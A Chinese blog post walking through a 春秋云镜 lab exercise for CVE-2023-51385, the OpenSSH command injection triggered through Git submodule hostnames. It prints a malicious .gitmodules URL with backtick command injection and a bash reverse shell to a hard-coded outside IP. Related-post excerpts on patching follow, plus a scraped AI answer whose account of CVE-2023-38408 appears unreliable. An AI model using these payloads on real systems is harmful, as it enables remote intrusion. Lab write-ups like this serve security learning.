春秋云镜(OpenSSH)·CVE-2023-51385

已于 2024-08-30 15:48:19 修改
阅读量530 收藏 2
点赞数 2
文章标签: 安全 web安全
于 2024-08-30 15:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_61155226/article/details/141719165
版权

靶标介绍:

        OpenSSH 是使用 SSH 协议进行远程登录的连接工具。在OpenSSH 9.6版本之前的ssh中,如果用户名或主机名中含有shell元字符(如 | ' "等),并且ssh_config中ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会发生命令注入。Git未禁止用户或主机名中的shell元字符,存储库可能包含一个带有shell元字符的子模块用户或主机名,可能导致产生命令注入漏洞。

  参考资料:mp.weixin.qq.com/s/6LwOlPSVQgwqkSFZ2iys7g

   我们访问靶场如下图所示:

我们先使用Gitee从GitHub导入仓库:

然后访问该仓库,创建一个shell.sh文件,并修改.gitmodules文件的内容如下,然后保存:

[submodule "cve"]
	path = cve
	url = ssh://`bash shell.sh`foo.ichunqiu.com/bar
bash -c 'exec bash -i &>/dev/tcp/159.75.114.131/8889 <&1'

然后VPS开启监听:

在靶机中,填入你的仓库地址,然后点击一键部署,即可获取到反弹Shell:

SlackMoon
关注
Cockpit upload文件上传漏洞(CVE-2023-1313)
0xSec
12-16 2346
Cockpitassetsmanager/upload接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
Centos7,升级OpenSSH(亲测有效适用于小白)
weixin_61753702的博客
08-01 5898
该漏洞影响 Linux、macOS、BSD 以及其他操作系统上 OpenSSH 客户端和服务器实现的所有用户。由于 OpenSSH 是使用最广泛的 SSH 实现之一,因此影响相当广泛。如果成功利用,该缺陷可能会被用来绕过身份验证并获得对运行易受攻击的 OpenSSH 版本的系统的未经授权的远程访问。如是个人学习升级openssh,建议升级前拍摄快照。安装所需软件包,以及用于编译和安装从源代码构建的软件。如出现一下内容为以及将所需软件包安装完成,无需再安装。服务器,确保在SSH服务器升级异常时,可以通过。
CVE-2023-51385 OpenSSH ProxyCommand命令注入漏洞
mirocky的博客
01-09 4279
ssh_config文件中的ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会导致命令注入的风险。在Git中,用户或主机名中的shell元字符未被禁止(如在主机名中进行命令拼接),这可能导致存储库包含一个带有shell元字符的子模块用户或主机名。这种情况可能引发命令注入漏洞。
CVE-2023-1313
weixin_53974661的博客
02-24 322
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。通过/install 来安装。
CVE-2023-51385
Dikesi的博客
02-09 1239
Ssh ProxyCommand漏洞
OpenSSH漏洞CVE-2023-51385可能允许远程执
极道Jdon的技术博客
12-26 2376
被跟踪为CVE-2023-51385的漏洞源于在 OpenSSH 中使用 ProxyCommand 或 ProxyJump 功能时在某些情况下对用户提供的输入验证不足。如果成功利用,该缺陷可能会被用来绕过身份验证并获得对运行易受攻击的 OpenSSH 版本的系统的未经授权的远程访问。,所有受影响的用户应紧急更新到最新的 OpenSSH 版本 9.6p1,其中包含此缺陷的修复程序。用户还应该谨慎对待来自不受信任来源的主机名。这表明该漏洞是真实存在的,远程攻击者在适当的情况下是可以利用的。
CentOS 7 升级OpenSSH 9.6p1解决OpenSSH 安全漏洞CVE-2023-51385
ZHUMUYI0的博客
06-04 2629
CentOS7 OpenSSH安全加固
CentOS 7 升级OpenSSH 9.6p1解决安全漏洞CVE-2023-51384、CVE-2023-51385
weixin_45371131的博客
02-27 2194
openssh9.6P1,
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
tar xzf openssh-8.4p1.tar.gz cd openssh-8.4p1 ./configure make sudo make install ``` 4. 更新sshd配置文件(通常位于/etc/ssh/sshd_config),根据需求进行必要的调整,并确保安全性设置正确。 5. 重启...
OpenSSH 安全漏洞(CVE-2023-51385)修复、openss9.7p1
qq_55854984的博客
04-26 1058
OpenSSH 安全漏洞(CVE-2023-51385OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞。
CVE-2023-38408漏洞修复 - 升级openssl和openssh
热门推荐
老杜的博客
03-27 1万+
CVE-2023-38408 漏洞是OpenSSH 代码问题漏洞修复,升级openssl和openssh
统信UOS1050e -openssh 9.6p1升级包
03-07
统信UOS1050e -------openssh 9.6p1升级包,修复OpenSSH 安全漏洞(CVE-2023-51385)
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385
Flamingo1998的博客
12-27 3362
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9,不可思议
04-18 1221
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CVE-2023-1313复现(春秋
weixin_62248541的博客
10-15 1113
cockpit在2.4.1版本之前存在任意文件上传漏洞。PS:通过在浏览器中打开/install来重新安装。
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)附验证方法
Elliot1314的博客
01-29 1171
OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。近日,新华三盾山实验室监测到OpenSSH官方发布了安全公告,修复了一个存在于OpenSSH中的命令注入漏洞(CVE-2023-51385),攻击者可利用该漏洞注入恶意Shell字符导致命令注入。此漏洞是由于OpenSSH中的ProxyCommand命令未对%h、%p或类似的扩展标记进行正确的过滤,攻击者可通过这些值注入恶意shell字符进行命令注入攻击。配置完成后,执行下面的指令触发。
春秋CVE-2023-1313
2303_76653367的博客
05-10 504
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。5.获取文件地址,右键download在新窗口中打开链接,得到文件存放地址。2.访问install,得到账号密码:admin\admin。发现需要账号密码,按题目要求访问install。3.进入主页,发现上传页面,上传一句话木马。比较简单的一道文件上传题。
Goby 漏洞发布|Cockpit 平台 upload 文件上传漏洞(CVE-2023-1313)
m0_46699477的博客
09-28 1033
Cockpit 是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。Cockpit 存在文件上传漏洞,攻击者可上传任意文件,进而导致服务器被控制等。
OpenSSH 安全漏洞(CVE-2023-38408)
最新发布
03-29
<think>嗯,用户想了解OpenSSHCVE-2023-38408漏洞详情和修复方法。首先,我得查一下这个漏洞的具体信息。根据提供的引用,引用[1]提到这是一个代码问题漏洞,需要升级到最新版本,并且在sshd_config中添加HostKeyAlgorithms。用户可能在升级过程中遇到了问题,比如客户端连接时报错“no hostkey alg”,所以需要确认修复步骤是否正确。 接下来,需要详细说明漏洞的影响。这个漏洞可能允许攻击者通过特定的主机密钥算法绕过安全验证,导致中间人攻击。关键点在于支持的算法列表不完善,导致客户端无法找到有效的主机密钥。修复方法包括升级OpenSSH到修复版本,并配置HostKeyAlgorithms参数。需要确保用户正确安装新版本,并修改配置文件,然后重启服务。 可能用户遇到的常见问题包括依赖项冲突或配置文件错误,需要提醒他们检查安装步骤和配置语法。此外,生成相关问题时,应该考虑用户可能还想知道如何验证修复是否成功,或者是否有其他相关漏洞需要处理,比如CVE-2023-51384和51385,引用[2]提到了这些,可能需要一并说明。</think>### OpenSSH CVE-2023-38408 漏洞详情及修复方案 #### 漏洞描述 CVE-2023-38408 是 OpenSSH 中存在的一个代码逻辑缺陷,主要影响客户端与服务器之间的密钥交换过程。当客户端尝试连接未明确配置支持的密钥算法时,可能触发`no hostkey alg`错误[^1]。此漏洞可能被攻击者利用,通过中间人攻击(MitM)绕过安全验证,导致未授权的访问或数据泄露。 #### 漏洞影响范围 - **受影响版本**:OpenSSH 8.9 及更早版本 - **触发条件**:服务器未正确配置支持的密钥算法(如缺少`ssh-rsa`等),且客户端请求的算法与服务器配置不匹配。 --- #### 修复方案 1. **升级 OpenSSH安全版本** 通过官方渠道升级到修复版本(如 OpenSSH 9.6p1 或更高),以下是 CentOS 7 的升级示例: ```bash # 卸载旧版本(注意依赖处理) rpm -e openssh-clients --nodeps rpm -e openssh-server --nodeps rpm -e openssh-9.4p1 --nodeps # 安装新版本 rpm -ivh openssh-9.6p1-1.el7.x86_64.rpm \ openssh-server-9.6p1-1.el7.x86_64.rpm \ openssh-clients-9.6p1-1.el7.x86_64.rpm # 验证版本 ssh -V ``` 引用[2]中提供了类似的操作步骤。 2. **配置`sshd_config`文件** 在`/etc/ssh/sshd_config`中明确指定支持的密钥算法: ```bash HostKeyAlgorithms ssh-rsa,ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521 ``` 保存后重启服务: ```bash systemctl restart sshd ``` 3. **验证修复** 通过客户端连接测试是否消除`no hostkey alg`错误: ```bash ssh -vvv user@server_ip ``` --- #### 注意事项 - **依赖冲突**:升级时若出现依赖问题,需使用`--nodeps`强制卸载旧包(需谨慎操作)。 - **兼容性**:`ssh-rsa`算法因安全性问题逐步淘汰,建议优先使用`ed25519`或`ecdsa`[^1]。 ---
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值